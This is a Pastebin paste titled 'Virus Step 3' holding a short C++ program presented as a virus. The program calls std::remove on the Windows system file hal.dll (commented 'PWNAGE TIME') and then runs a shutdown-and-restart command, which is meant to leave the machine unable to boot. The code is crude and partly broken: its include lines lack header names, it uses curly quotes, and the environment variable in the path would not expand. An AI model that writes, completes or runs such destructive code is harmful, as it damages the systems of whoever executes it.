Advertisement
G40

Virus Step 3

G40
Sep 25th, 2013
44
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. #include
  2. #include
  3. using namespace std;
  4. int main(int argc, char *argv[])
  5. {
  6. std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
  7. system(”shutdown -s -r”);
  8. system(”PAUSE”);
  9. return EXIT_SUCCESS;
  10. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement